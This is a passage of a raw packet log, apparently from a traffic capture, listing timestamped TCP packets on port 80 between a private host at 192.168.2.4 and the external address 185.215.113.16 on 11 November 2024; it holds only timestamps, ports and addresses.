Nov 11, 2024 01:14:23.300586939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300597906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300609112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300621033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300622940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300632954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300640106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300647020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300654888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300677061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300693035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300757885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300770044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300781012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300793886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300802946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300807953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300820112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300831079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.300832987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300853014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.300868034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301045895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301057100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301069021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301079988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301089048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301090956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301100016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301104069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301116943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301130056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301152945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301189899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301201105 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301217079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301229000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301238060 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301249027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301282883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301325083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301336050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301347017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301367998 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301395893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301440001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301453114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301481009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301492929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301609039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301620960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301631927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301644087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301655054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301655054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301666975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301678896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301680088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301692009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301698923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301703930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301714897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301714897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301728010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301739931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301740885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301753044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301772118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301775932 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301783085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301794052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301812887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301841974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301918983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301932096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301943064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301954031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301964045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301966906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301979065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.301990032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.301991940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302002907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302015066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302016973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302027941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302047014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302047968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302059889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302067995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302071095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302084923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302088976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302098989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302110910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302124977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302134037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302159071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302181959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302194118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302203894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302215099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302225113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302227974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302237988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302249908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302257061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302269936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302293062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302323103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302335024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302344084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302355051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302369118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302373886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302381039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302407026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302419901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302469969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302486897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302500010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.302515984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.302526951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.303885937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.303896904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.303908110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.303920031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.303936958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.303965092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304023027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304034948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304047108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304068089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304092884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304171085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304183006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304193020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304204941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304215908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304218054 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304228067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304236889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304241896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304250956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304254055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304269075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304276943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304303885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304311037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304318905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304331064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304349899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304373026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304482937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304495096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304503918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304514885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304527044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304533958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304541111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304546118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304560900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304574013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304578066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304589033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304600954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304603100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304614067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304634094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304636002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304647923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304661036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304665089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304677010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304682016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304709911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304713011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304727077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304737091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304748058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304759026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304759979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304770947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304789066 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304790020 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304802895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304802895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304816008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304826021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304827929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304843903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304869890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.304948092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304961920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304971933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304982901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304991961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.304996014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305003881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305010080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305016994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305028915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305038929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305046082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305054903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305068016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305077076 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305090904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305102110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305110931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305113077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305128098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305135012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305139065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305151939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305161953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305165052 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305177927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305185080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305191040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305203915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305234909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305236101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305248976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305260897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305272102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305275917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305284977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305295944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305301905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305309057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305320024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305330038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305334091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305341959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305354118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305355072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305362940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305397987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305535078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305547953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305557966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305568933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305579901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305579901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305593014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305594921 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305608034 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305619001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305624962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305630922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305644035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305655956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305660009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305661917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305672884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305684090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305684090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305696964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305706978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305710077 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305722952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305735111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305746078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305746078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305758953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305763960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305784941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305795908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305808067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305813074 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305819035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305830956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305840015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305841923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305850029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305855989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305866957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305877924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305880070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305896997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305919886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305924892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305936098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305947065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305958033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305963039 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.305977106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.305994987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306000948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306008101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306011915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306039095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306042910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306068897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306081057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306086063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306092978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306106091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306112051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306121111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306144953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306225061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306238890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306250095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306272984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306286097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306375980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306386948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306396961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306408882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306417942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306421041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306432962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306443930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306456089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306456089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306467056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306468010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306479931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306495905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306521893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306525946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306539059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306551933 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306564093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306566954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306576967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306587934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306591988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306600094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306611061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306617975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306622982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306634903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306641102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306648016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306652069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306662083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306674004 CET	80	49762	185.215.113.16	192.168.2.4
